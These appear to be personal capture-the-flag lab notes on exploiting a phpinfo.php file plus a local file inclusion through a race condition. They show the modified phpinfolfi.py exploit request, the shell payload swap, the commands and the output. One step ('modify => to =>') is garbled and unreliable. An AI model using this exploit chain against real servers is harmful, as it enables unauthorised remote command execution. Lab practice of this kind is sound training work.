5 foothold_2 phpinfo.php + LFI
# phpinfo.php contains file_uploads: ON
# if phpinfo.php + LFI is possible, its possible to creat race condition and have command execution
Using https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/File%20Inclusion/phpinfolfi.py
# modifications (1 more down)
1. in place of paylaod (don't modify the full variable), put entire shell.php
2. LFIREQ="""GET /browse.php?file=%s%%00 HTTP/1.1\r
$ python phpinfolfi.py localhost 80 100
Don't forget to modify the LFI URL
LFI With PHPInfo()
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Getting initial offset... Traceback (most recent call last):
File "phpinfolfi.py", line 371, in <module>
main()
File "phpinfolfi.py", line 331, in main
offset = getOffset(host, port, reqphp)
File "phpinfolfi.py", line 290, in getOffset
raise ValueError("No php tmp_name in phpinfo output")
ValueError: No php tmp_name in phpinfo output
# added redirection via burp to debug the error and
# checking the reponse and saw [tmp_name] =>.
# in the script its [tmp_name] =>
3. modify => to =>
# worked.
# remove burp proxy
$ python phpinfolfi.py 10.10.10.84 80 200
Don't forget to modify the LFI URL
LFI With PHPInfo()
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Getting initial offset... found [tmp_name] at 112940
Spawning worker pool (200)...
1000 / 1000
:(
Shuttin' down...
# should get shell
Last updated